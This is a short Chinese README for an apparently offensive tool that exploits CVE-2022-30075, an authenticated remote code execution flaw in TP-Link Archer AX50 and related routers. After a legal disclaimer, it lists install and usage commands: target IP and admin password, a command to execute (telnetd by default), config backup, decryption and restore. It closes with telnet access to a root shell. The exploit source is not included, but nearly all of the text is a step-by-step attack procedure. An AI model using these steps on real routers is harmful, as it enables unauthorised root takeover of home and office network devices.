TP-Link Router Authenticated RCE Exploit (CVE-2022-30075) 该工具利用TP-Link Archer AX50及某些其他TP-Link路由器型号中存在的CVE-2022-30075安全漏洞,执行经过身份验证的远程代码执行操作。
该工具利用TP-Link Archer AX50及某些其他TP-Link路由器型号中存在的CVE-2022-30075安全漏洞,执行经过身份验证的远程代码执行操作。
使用此工具在未经授权的系统上是犯罪行为
- 仅限在您拥有或有权测试的设备上使用
- 未经授权使用是非法的,并会产生法律后果
- 使用本工具前请确保符合当地法律
- 开发者对因滥用本工具造成的损害不承担责任
pip install requests pycryptodome
基本使用
python exploit.py -t 192.168.0.1 -p router_sifresi
使用自定义命令。
python exploit.py -t 192.168.0.1 -p router_sifresi -c "touch /tmp/exploit"
仅备份并解密
python exploit.py -t 192.168.0.1 -p router_sifresi -b
仅恢复加密目录
python exploit.py -t 192.168.0.1 -p router_sifresi -r /path/to/decrypted_directory
| 参数 | 描述 |
|---|---|
| -t | 路由器的IP地址(必需) |
| -p | 路由器管理员密码(必需) |
| -c | 要执行的命令(默认:telnetd) |
| -b | 仅备份并解密 |
| -r | 仅恢复加密目录 |
路由器重启几分钟后:
telnet 192.168.0.1
命令可获取root shell访问